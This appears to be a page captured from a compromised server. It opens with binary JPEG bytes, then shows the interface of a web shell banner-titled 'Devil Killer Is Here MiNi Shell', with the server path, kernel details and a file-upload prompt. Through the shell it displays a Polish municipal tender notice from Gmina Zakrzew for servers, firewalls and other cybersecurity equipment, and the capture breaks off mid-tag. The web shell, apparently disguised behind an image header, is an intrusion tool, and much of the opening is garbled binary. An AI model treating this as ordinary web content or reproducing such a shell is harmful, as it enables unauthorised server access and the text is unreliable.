JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250319/0015229601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup wyposażenia w ramach programu „Cyberbezpieczny samorząd” – zakup sprzętu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zakrzew</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670224077</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zakrzew 51</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakrzew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-652</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">486105122</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@zakrzew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zakrzew.biuletyn.net/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup wyposażenia w ramach programu „Cyberbezpieczny samorząd” – zakup sprzętu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60f0aaa1-e65f-4da5-b00a-8bab85cd04a0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00152296</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00033868/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup wyposażenia w ramach programu „Cyberbezpieczny samorząd” – zakup sprzętu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt finansowany ze środków Funduszy Europejskich Na Rozwój Cyfrowy 2021-2027 (FERC) w ramach Programu Operacyjnego Cyfrowa Polska Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2. – Wzmocnienie krajowego systemu cyberbezpieczeństwa. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1067749 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy zakupowej pod adresem https://platformazakupowa.pl/transakcja/1067749</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Szczegółowe instrukcje korzystania z platformy zakupowej znajdują się na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>2. W postępowaniu komunikacja między Zamawiającym a wykonawcami, w szczególności składanie oświadczeń, dokumentów, wniosków, zawiadomień, oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem Platformy i formularza „Wyślij wiadomość” dostępnego na stronie dotyczącej danego postępowania, z wyłączeniem składania ofert.<br/>3. Komunikacja za pośrednictwem poczty elektronicznej na adres e-mail: zamowienia@zakrzew.pl, jest dopuszczalna w wyjątkowej sytuacji, np. w przypadku awarii platformy zakupowej (nie dotyczy składania ofert).<br/>4. Maksymalny rozmiar pliku przesyłanego za pośrednictwem platformy zakupowej (nie dotyczy złożenia oferty) wynosi 500 MB (maksymalnie 10 plików w jednej wiadomości).<br/>5. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z „Obwieszczeniem Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>5.Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformie zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram;<br/>procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich<br/>nowsze wersje;<br/>3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>6) szyfrowanie na platformie zakupowej odbywa się za pomocą protokołu TLS 1.3.;<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. W postępowaniu o udzielenie zamówienia ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, składa się, pod rygorem nieważności w formie elektronicznej (sporządzona w postaci elektronicznej, opatrzona kwalifikowanym podpisem elektronicznym osoby uprawnionej) lub w postaci elektronicznej, opatrzona podpisem zaufanym lub elektronicznym podpisem<br/>osobistym osoby uprawnionej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <p class="mb-0">angielski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. informuje, iż:<br/>1.	Administratorem Pani/Pana danych osobowych jest Gmina Zakrzew reprezentowana przez Wójta, Zakrzew 51, 26-652 Zakrzew, <br/>2.	Administrator wyznaczył Inspektora Ochrony Danych, Pana Bartłomieja Kida z którym mogą się Państwo skontaktować pod adresem e-mail: <br/>•	bodo.radom@gmail.com <br/>3.	Pani/Pana dane osobowe przetwarzane będą w celu:<br/>•	Prowadzenia postępowania o udzielenie zamówienia publicznego <br/>4.	Podstawę prawną przetwarzania danych osobowych stanowią przepisy:<br/>•	art. 6 ust.1 lit c) rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.4.2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (tj. przetwarzanie danych osobowych jest niezbędne dla wypełnienia prawnego obowiązku ciążącego na administratorze),<br/>•	obowiązek prawny wynikający z ustawy z dnia 11 września 2019 r Prawo zamówień publicznych(t.j. Dz. U. z 2024 r. poz. 1320) i aktów wykonawczych do ustawy<br/>•	obowiązek prawny wynikający z kodeksu postępowania administracyjnego (Dz.U. z 2024 r., poz. 572) <br/>•	obowiązek prawny wynikający z art. 56 ustawy z 14.07.1983r. o narodowym zasobie archiwalnym i archiwach (Dz.U. z 2020 r., poz. 164), w tym Rozporządzenie Prezesa Rady Ministrów z dnia 18 stycznia 2011r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych – obowiązek zarchiwizowania sprawy.<br/>5.	Odbiorcami Pani/Pana danych osobowych mogą być wyłącznie podmioty uprawnione do pozyskania danych osobowych na podstawie przepisów prawa w szczególności:<br/>•	urzędy administracji rządowej i samorządowej, <br/>•	sądy Powszechne,<br/>•	wszystkie zainteresowane podmioty i osoby, gdyż co do zasady postepowanie o udzielenie zamówienia publicznego jest jawne,<br/>•	o ile będzie to konieczne dla realizacji celu, o którym mowa w pkt. 2, wyłącznie osoby upoważnione przez Administratora do przetwarzania danych osobowych, pracownicy Administratora oraz podmioty, z którymi Administrator zawarł umowę powierzenia przetwarzania danych osobowych, o której mowa w art. 28 ust. 3 RODO.<br/>6.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>7.	Posiada Pani/Pan następujące prawa związane z przetwarzaniem danych osobowych:<br/>•	prawo dostępu do treści swoich danych, <br/>•	prawo żądania sprostowania swoich danych osobowych, <br/>•	prawo do ograniczenia przetwarzania swoich danych osobowych, <br/>•	prawo do przenoszenia swoich danych osobowych.<br/>8.	W przypadku gdy uzna Pani/Pan iż przetwarzanie danych osobowych Pani/Pana narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. proszę o kontakt z Inspektorem danych Osobowych w celu uzyskania wyjaśnień oraz ma Pan/Pani prawo do powiadomienia o naruszeniu przepisów Prezesa Urzędu Ochrony Danych Osobowych z siedzibą przy ul. Stawki 2, 00-193 Warszawa.<br/>9.	Podanie przez Pana/Panią danych osobowych jest wymogiem ustawowym, a konsekwencją niepodania danych osobowych będzie uniemożliwienie Administratorowi wykonania nałożonego ustawami obowiązku określonego w pkt. 3.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa, instalacja, konfiguracja oraz wdrożenie infrastruktury IT, obejmującej w szczególności:<br/>a) Serwer o minimalnych parametrach technicznych: obudowa rack 2U, dwa procesory dwunastordzeniowe klasy x86, min. 128GB RAM DDR4 RDIMM, możliwość instalacji dysków SSD, HDD oraz M.2 NVMe w konfiguracji RAID, dwa zasilacze hot-plug max. 740W, serwerowy system operacyjny zgodny z Windows Server Standard Core 2022 lub równoważny;<br/>b) Router: obudowa max. 1U, min. 4-rdzeniowy procesor 1,4 GHz, min. 1GB RAM, min. 10 portów 10/100/1000 Ethernet, min. 1 port SFP+, wsparcie dla IPsec, wydajność min. 67 Mbps przy szyfrowaniu AES-128-CBC + SHA1;<br/>c) Macierz dyskowa: dwa kontrolery RAID w układzie active-active, min. 16GB cache na kontroler, obsługa min. 265 dysków, zainstalowane dyski SSD 1.92TB oraz HDD 2.4TB SAS, możliwość tworzenia min. 512 LUN’ów, obsługa replikacji danych;<br/>d) Mała macierz dyskowa (serwer pod logi): serwer NAS z min. 12 kieszeniami na dyski hot-swap, czterordzeniowy procesor 3,35 GHz, min. 32GB RAM ECC, obsługa RAID i wirtualizacji.<br/>e) Firewall sprzętowy: min. 10 portów Gigabit Ethernet RJ-45, obsługa IPS, VPN, filtracji stron WWW, monitoring ruchu sieciowego, zabezpieczenia antywirusowe i antyspamowe, wsparcie dla dynamicznych protokołów routingu, ochrona przed atakami DDoS;<br/>f) UPS sprzętowy: min. 800 VA / 480W, czas podtrzymania 80% obciążenia min. 2 minuty, zabezpieczenia przeciwzwarciowe i przeciążeniowe, sygnalizacja akustyczno-optyczna.<br/>g) Oprogramowanie wirtualizacyjne zgodne z KVM i LXC, obsługa klastrów wysokiej dostępności, wsparcie dla sieciowych i lokalnych pamięci masowych;<br/>h) Oprogramowanie do zdalnego pulpitu: min. 1 użytkownik, możliwość obsługi min. 100 urządzeń, obsługa systemów Windows, macOS, Android, iOS, uwierzytelnianie dwuskładnikowe;<br/>i) Klucze sprzętowe do uwierzytelniania: min. 20 szt., obsługa U2F, FIDO2, NFC, USB 2.0, brak konieczności baterii;<br/>j) Dyski zewnętrzne: min. 16TB, interfejs USB 3.2 Gen. 1, zabezpieczenia AES-256;<br/>k) UPS dla urzędu i przedszkola: min. 1200 VA / 600W, min. 2 x PN-E-93201 oraz 2 x IEC 320 C13 (10 A), sygnalizacja LCD;<br/>l) Switch dla przedszkola: min. 24 porty Gigabit Ethernet, 2 sloty SFP, obsługa zarządzania przez interfejs sieciowy;<br/>m) Kontroler sieci dla przedszkola: min. 8x 10/100/1000 Mb/s (RJ45), 1x 10 Gb/s (SFP+), procesor min. <br/>4-rdzeniowy 1,7 GHz;<br/>n) System monitoringu IT: monitoring infrastruktury IT, wykrywanie i audytowanie sprzętu, oprogramowania i aktywności użytkowników, zdalne zarządzanie i kontrola dostępu;<br/>o) Wdrożenie: montaż, konfiguracja, integracja i testy wdrożonej infrastruktury, dokumentacja powdrożeniowa.<br/>2.	Wykonawca zobowiązuje się do dostarczenia i wdrożenia niezbędnych licencji <br/>i oprogramowania wymienionych w Opisie Przedmiotu Zamówienia, w tym:<br/>a) Serwerowy system operacyjny zgodny z Windows Server Standard Core 2022 lub równoważny, <br/>z licencją obejmującą wszystkie rdzenie CPU w serwerze;<br/>b) Oprogramowanie wirtualizacyjne z licencją na min. 5 lat wsparcia technicznego;<br/>c) Oprogramowanie do zdalnego pulpitu z licencją na min. 2 lata;<br/>d) Licencje na system monitoringu IT dla min. 60 urządzeń, obejmujące pełną funkcjonalność systemu;<br/>e) Licencje dla firewalla na okres min. 24 miesięcy obejmujące IPS, Antywirus, Antyspam, Web Filtering, kontrolę aplikacji, analizy Sandbox.<br/>3.	Dostarczony sprzęt i oprogramowanie muszą spełniać wymagane normy techniczne <br/>i certyfikacyjne (ISO-9001, ISO-14001, a także zapewniać zgodność z istniejącą infrastrukturą Zamawiającego.<br/>4.	Dostarczone urządzenia muszą posiadać Deklarację zgodności UE, uprawniająca do znaczenia wyrobu znakiem bezpieczeństwa CE, i musza być oznaczone tym znakiem.<br/>5.	Wykonawca zobowiązuje się do zapewnienia gwarancji na dostarczone komponenty, w tym: <br/>a) …… lat gwarancji na serwer, obejmującej wszystkie podzespoły, w tym procesory, pamięć RAM, kontrolery RAID i zasilacze, <br/>b) …… lat gwarancji na macierz dyskową, obejmującej kontrolery, dyski, moduły pamięci cache oraz zasilacze redundantne, <br/>c) pozostały sprzęt zgodnie z warunkami gwarancji producenta,<br/>d) wdrożenie, konserwacja i serwis sprzętu zgodnie z warunkami zawartymi w formularzu ofertowym.<br/>6.	W ramach umowy Wykonawca przeprowadzi kompleksowe wdrożenie, w tym konfigurację urządzeń, integrację z istniejącymi systemami oraz testy stabilności i bezpieczeństwa.<br/>7.	Wykonawca przeprowadzi szkolenia dla personelu Zamawiającego w zakresie obsługi serwera, macierzy dyskowej, routera, firewalla oraz systemu monitoringu IT.<br/>8.	Wszelkie prace wdrożeniowe będą realizowane w terminach uzgodnionych z Zamawiającym, w sposób niezakłócający funkcjonowania urzędu.<br/>9.	Oprogramowanie będące Przedmiotem niniejszej Umowy jest utworem w rozumieniu ustawy <br/>z 4 lutego 1994 roku o prawie autorskim i prawach pokrewnych (t.j. Dz. U. z 2025 r. poz. 24.).<br/>10. Wykonawca oświadcza, że przysługują mu wyłączne i nieograniczone autorskie prawa majątkowe do utworów określonych w ust. 2, w zakresie w jakim jest to konieczne do udzielenia Zamawiającemu bezterminowej licencji na korzystanie z oprogramowania zgodnie z przeznaczeniem.<br/>11. Wykonawca oświadcza, że przysługujące mu autorskie prawa majątkowe do oprogramowania będącego Przedmiotem Umowy nie są obciążone prawami osób trzecich, ani nie zostały zajęte <br/>w rozumieniu przepisów dotyczących postępowań egzekucyjnych.<br/>12. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody, poniesione przez Zamawiającego <br/>w wyniku wystąpienia wad prawnych oprogramowania określonego w ust. 2, w szczególności <br/>w przypadku wystąpienia przez osoby trzecie przeciwko Zamawiającemu z roszczeniem dotyczącym naruszenia ich praw własności intelektualnej w odniesieniu do tego oprogramowania. W takim wypadku Wykonawca zobowiązuje się niezwłocznie zwolnić Zamawiającego z obowiązku świadczenia na rzecz osób trzecich i naprawić wynikłą stąd szkodę.<br/>13.	W przypadku niemożności korzystania przez Zamawiającego z oprogramowania, o którym mowa <br/>w ust. 2 w związku z roszczeniami opisanym w ust. 12, Wykonawca niezwłocznie, według swojego wyboru oraz na swój koszt:<br/>1) uzyska dla Zamawiającego licencję do dalszego korzystania z oprogramowania będącego przedmiotem sporu, lub <br/>2) wymieni oprogramowanie na nowe, posiadające te same cechy i funkcjonalności jak dotychczasowe lub zmodyfikuje oprogramowanie na niepowodujące naruszenia praw osób trzecich.<br/>14.	Wykonawca (Licencjodawca) oświadcza, że udziela Zamawiającemu (Licencjobiorcy) bezterminowej licencji na korzystanie z oprogramowania stanowiącego Przedmiot Umowy.<br/>15.	Licencja na oprogramowanie udzielona na podstawie niniejszej Umowy:<br/>1) mają charakter niewyłączny; <br/>2) są nieprzenoszalne; <br/>3) są niepodzielne; <br/>4) są nieograniczone terytorialnie;<br/>16.	Przedmiot umowy obejmuje ponadto pozostałe czynności wymienione w Opisie Przedmiotu Zamówienia (OPZ), stanowiącym załącznik nr 1 do niniejszej umowy.<br/>17.	Wykonawca oświadcza, że:<br/>1)	realizacja umowy przeprowadzona będzie zgodnie z umową, z przyjętą przez Zamawiającego ofertą oraz obowiązującymi przepisami prawa;<br/>2)	dostarczy wymienione w umowie urządzenia na swój koszt;<br/>3)	Wymienione urządzenia są fabrycznie nowe tzn. nieużywane przed dniem dostarczenia <br/>z wyłączeniem używania niezbędnego dla przeprowadzenia testu ich poprawnej pracy <br/>i pochodzą z bieżącej produkcji;<br/>4)	Urządzenia są jego własnością, są wolne od wad fizycznych i prawnych, nie są obciążone żadnymi prawami osób trzecich oraz nie są przedmiotem żadnego postępowania egzekucyjnego lub zabezpieczenia;<br/>5)	posiada wiedzę, umiejętności i kwalifikacje do prawidłowego i zgodnego z prawem wykonania przedmiotu umowy.<br/>18. Pod pojęciem dostawa należy rozumieć (dostawa, montaż, uruchomienie, przeprowadzenie szkolenia, pozostałe czynności, o których mowa w Opisie Przedmiotu Zamówienia):<br/>	Serwer, router, macierz dyskowa, mała macierz dyskowa (serwer pod logi), firewall sprzętowy, UPS sprzętowy, dyski zewnętrzne, UPS dla urzędu – Urząd Gminy w Zakrzewie, Zakrzew 51,<br/>	UPS dla przedszkola, switch dla przedszkola, kontroler sieci dla przedszkola – Przedszkole Samorządowe w Bielisze, ul. Ks. Bogdana Szczepanika 2, Bielicha, 26-600 Radom <br/>19.	Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody, w tym usterki i uszkodzenia, powstałe <br/>w mieniu Zamawiającego w wyniku działań, zaniechań lub zaniedbań Wykonawcy, jego pracowników, podwykonawców lub innych osób działających na jego zlecenie, podczas realizacji zamówienia. <br/>20.	Wykonawca zobowiązuje się, po zakończeniu montażu urządzeń, do posprzątania pomieszczeń, <br/>w których były prowadzone prace montażowe, w tym do usunięcia wszelkich odpadów, narzędzi, materiałów oraz zabrudzeń powstałych w trakcie realizacji przedmiotu umowy.<br/>21.	Szczegółowe warunki realizacji zamówienia, w tym obowiązki Wykonawcy związane <br/>z odpowiedzialnością za usterki oraz obowiązkiem posprzątania pomieszczeń po urządzeń, zostały określone w projekcie umowy, stanowiącym załącznik nr 4 do SWZ.<br/>22.	Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 5 do SWZ.<br/>23.	Wszystkie dokumenty składane w postępowaniu, w tym oferta oraz dokumentacja przetargowa, muszą być sporządzone w języku polskim. Dokumenty powdrożeniowe, o których mowa w Opisie Przedmiotu Zamówienia, stanowiącym załącznik nr 5 do SWZ, wymienione w pkt 16 „Wdrożenie”, ppkt 8) „Dokumentacja powdrożeniowa”, również muszą zostać dostarczone w języku polskim. Wyjątek stanowi dokumentacja użytkownika dotycząca sprzętu, w tym instrukcje obsługi oraz specyfikacje techniczne, które mogą być dostarczone zarówno w języku polskim, jak i angielskim – bez konieczności ich tłumaczenia na język polski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30233100-2 - Komputerowe jednostki do przechowywania</p> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <h3 